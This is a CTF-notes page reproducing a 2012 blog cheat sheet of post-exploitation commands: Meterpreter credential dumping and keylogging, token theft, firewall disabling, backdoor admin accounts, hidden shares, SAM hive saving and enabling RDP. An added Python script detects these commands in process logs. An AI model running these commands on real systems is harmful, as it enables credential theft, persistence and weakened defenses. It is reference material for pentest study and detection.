forked from Shiva108/CTF-notes
post_exploit_commands.html
<h1>Post Exploit Commands</h1>
<i>Published February 7, 2012 | By phillips321</i>
Credit for most of the below comes from Mubix, who has created a few documents
(on Google Docs) that list what to actually do once shell access has been gained.
You can read more about it here and find the links to the docs;
I'm simply blogging about it to make a summary of this for myself.
<h2>Meterpreter Post Auth</h2>
<h3>Information Gathering</h3>
getuid
getpid
getprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credcollect
run get_local_subnets
<h3>Escalating Privs</h3>
ps then migrate
getsystem
<h3>Tokens (use incognito)</h3>
list_tokens -u
impersonate_token
steal_token [pid]
rev2self
<h3>Retrieve Passwords</h3>
hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
<h3>Session</h3>
enumdesktops
getdesktop
setdesktop
uictl disable keyboard
<h3>Keylog</h3>
keyscan_start
keyscan_dump
keyscan_stop
<h2>Nix Post Auth</h2>
<h3>Disable Firewall</h3>
/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules
<h3>Files to pull</h3>
/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/group OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers
<h3>User Information</h3>
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
<h2>Windows Post Auth</h2>
<h3>Get current logged in user</h3>
@echo %USERNAME%
<h3>Add user</h3>
net user pentest password /add
net localgroup administrators pentest /add
<h3>Add share</h3>
net share nothing$=C:\ /grant:pentest,FULL /unlimited
<h3>Disable Firewall</h3>
netsh firewall set opmode disable
<h3>Auto Start Directories</h3>
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\WINDOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\
<h3>Accounts and Policies</h3>
net localgroup administrators OR net localgroup administrators /domain
net group "Domain Admins" /domain
net accounts OR net accounts /domain
<h3>Files to pull</h3>
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive
<h3>Enable Remote Desktop</h3>
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
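As an added, defender-side example that is not part of the original post: every command in the Windows section above leaves a distinctive process-creation record (the CommandLine field of Windows Security event 4688 or Sysmon event 1), so they are cheap to alert on. The script below, written for this edit, matches those exact commands against constructed sample command lines; it also covers the newer netsh advfirewall form of the firewall-disable command, which the post does not mention, and the constructed sample lines include two benign lookups to show they do not fire.

```python
"""Flag process command lines matching the post-exploitation commands on this
page: net user /add, net localgroup administrators /add, net share /grant,
netsh firewall disable, reg save of credential hives, and the
fDenyTSConnections RDP toggle. Input: a list of CommandLine strings."""
import re

# Each rule is (name, pattern). Patterns are case-insensitive and tolerate
# extra whitespace, net1.exe / reg.exe spellings and either quote style.
RULES = [
    ("local_user_created",
     re.compile(r"\bnet1?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I)),
    ("added_to_administrators",
     re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("share_created_with_grant",
     re.compile(r"\bnet1?\s+share\s+\S+=\S+.*?/grant:", re.I)),
    ("firewall_disabled",          # legacy form from the page plus advfirewall
     re.compile(r"\bnetsh\s+(?:firewall\s+set\s+opmode\s+disable"
                r"|advfirewall\s+set\s+\w+\s+state\s+off)\b", re.I)),
    ("credential_hive_saved",
     re.compile(r"\breg(?:\.exe)?\s+save\s+[\"']?HKLM\\(?:SAM|SYSTEM|SECURITY)\b", re.I)),
    ("rdp_enabled_via_registry",
     re.compile(r"\breg(?:\.exe)?\s+add\s+.*fDenyTSConnections.*?/d\s+0\b", re.I)),
]


def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, pat in RULES if pat.search(cmdline)]


def scan(lines):
    """Return (rule_name, cmdline) pairs for all matching lines."""
    return [(name, line) for line in lines for name in classify(line)]


# Constructed sample command lines (not real telemetry): the page's commands
# plus two benign administrative lookups that must not produce a hit.
SAMPLE_CMDLINES = [
    "net user pentest password /add",
    "net localgroup administrators pentest /add",
    r"net share nothing$=C:\ /grant:pentest,FULL /unlimited",
    "netsh firewall set opmode disable",
    r"reg save HKLM\SAM sam.hive",
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    "net user",                                                   # benign: lists accounts
    r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion",  # benign: read-only
]

if __name__ == "__main__":
    for name, line in scan(SAMPLE_CMDLINES):
        print(f"{name:26} {line}")
```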